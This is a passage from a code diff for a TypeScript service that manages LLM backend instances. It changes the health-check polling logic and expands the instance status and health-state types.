console.error(`Failed to start health check for ${instanceName}:`, error)
})
}
/**
* Adjust polling interval based on current health state
*/
private adjustPollingInterval(instanceName: string, state: HealthState): void {
// Clear existing interval
this.stopHealthCheck(instanceName)
const pollInterval = POLLING_INTERVALS[state]
// Don't poll for stable states (stopped, failed)
if (pollInterval === 0) {
return
}
// Start new interval with appropriate timing
const interval = setInterval(async () => {
try {
const health = await this.performHealthCheck(instanceName)
this.notifyCallbacks(instanceName, health)
// Check if state changed and adjust interval
const previousState = this.lastHealthState.get(instanceName)
this.lastHealthState.set(instanceName, health.state)
if (previousState !== health.state) {
this.adjustPollingInterval(instanceName, health.state)
}
} catch (error) {
console.error(`Health check failed for ${instanceName}:`, error)
// Continue polling even on error
}
}, pollInterval)
this.intervals.set(instanceName, interval)
}
/**
* Stop health checking for an instance
*/
private stopHealthCheck(instanceName: string): void {
const interval = this.intervals.get(instanceName)
if (interval) {
@@ -96,6 +246,9 @@ class HealthService {
}
}
/**
* Notify all callbacks with health update
*/
private notifyCallbacks(instanceName: string, health: HealthStatus): void {
const callbacks = this.callbacks.get(instanceName)
if (callbacks) {
@@ -103,16 +256,21 @@ class HealthService {
}
}
stopAll(): void {
/**
* Stop all health checking and cleanup
*/
destroy(): void {
this.intervals.forEach(interval => clearInterval(interval))
this.intervals.clear()
this.callbacks.clear()
this.lastHealthState.clear()
this.healthCache.clear()
}
}
export const healthService = new HealthService()
// Export the individual checkHealth function as well
// Export the individual performHealthCheck function as well
export async function checkHealth(instanceName: string): Promise<HealthStatus> {
return healthService.checkHealth(instanceName)
}
return healthService.performHealthCheck(instanceName)
}

View File

@@ -39,6 +39,9 @@ export const CreateInstanceOptionsSchema = z.object({
// Backend configuration
backend_type: z.enum([BackendType.LLAMA_CPP, BackendType.MLX_LM, BackendType.VLLM]).optional(),
backend_options: BackendOptionsSchema.optional(),
// Node configuration
nodes: z.array(z.string()).optional(),
})
// Re-export types and schemas from backend files

View File

@@ -11,12 +11,16 @@ export const BackendType = {
export type BackendTypeValue = typeof BackendType[keyof typeof BackendType]
export type InstanceStatus = 'running' | 'stopped' | 'failed'
export type InstanceStatus = 'running' | 'stopped' | 'failed' | 'restarting' | 'shutting_down'
export type HealthState = 'stopped' | 'starting' | 'ready' | 'failed' | 'restarting' | 'shutting_down'
export interface HealthStatus {
status: 'ok' | 'loading' | 'error' | 'unknown' | 'failed'
message?: string
state: HealthState
instanceStatus: InstanceStatus
lastChecked: Date
error?: string
source: 'backend' | 'http'
}
export interface Instance {

Some files were not shown because too many files have changed in this diff Show More